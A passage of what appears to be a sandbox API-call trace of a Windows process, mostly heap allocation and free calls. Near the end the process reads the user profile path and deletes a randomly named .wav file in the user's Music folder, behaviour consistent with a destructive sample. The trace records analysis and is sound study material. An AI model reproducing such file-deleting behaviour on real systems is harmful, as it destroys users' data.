dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.116] CloseHandle (hObject=0x2d0) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.116] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.118] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0252.118] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0252.118] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa268 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa90 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0252.119] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0252.119] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0252.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0252.120] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.120] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.120] CloseHandle (hObject=0x2a0) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0252.121] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0252.122] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.122] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0252.122] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0252.123] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0252.123] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0252.124] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0252.125] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a4048 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0252.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0252.128] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0252.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0252.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0252.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0252.129] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0252.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa928 [0252.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.130] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0252.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0252.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0252.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0252.131] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x74) returned 0x24f5278 [0252.132] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", lpFilePart=0x8bedfc*="HwKg28SMvdgN7pz7S.wav") returned 0x39 [0252.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f5278 | out: hHeap=0x25c0000) returned 1 [0252.132] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hwkg28smvdgn7pz7s.wav")) returned 0x20 [0252.132] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eaf9690, ftCreationTime.dwHighDateTime=0x1d4caa6, ftLastAccessTime.dwLowDateTime=0xf62ebce0, ftLastAccessTime.dwHighDateTime=0x1d4d203, ftLastWriteTime.dwLowDateTime=0xf62ebce0, ftLastWriteTime.dwHighDateTime=0x1d4d203, nFileSizeHigh=0x0, nFileSizeLow=0x3fd3, dwReserved0=0x12ab, dwReserved1=0x4, cFileName="HwKg28SMvdgN7pz7S.wav", cAlternateFileName="HWKG28~1.WAV")) returned 0xaa5660 [0252.132] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\HwKg28SMvdgN7pz7S.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\hwkg28smvdgn7pz7s.wav")) returned 1 [0252.133] FindNextFileW (in: hFindFile=0xaa5660, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6eaf9690, ftCreationTime.dwHighDateTime=0x1d4caa6, ftLastAccessTime.dwLowDateTime=0xf62ebce0, ftLastAccessTime.dwHighDateTime=0x1d4d203, ftLastWriteTime.dwLowDateTime=0xf62ebce0, ftLastWriteTime.dwHighDateTime=0x1d4d203, nFileSizeHigh=0x0, nFileSizeLow=0x3fd3, dwReserved0=0x12ab, dwReserved1=0x4, cFileName="HwKg28SMvdgN7pz7S.wav", cAlternateFileName="HWKG28~1.WAV")) returned 0 [0252.133] FindClose (in: 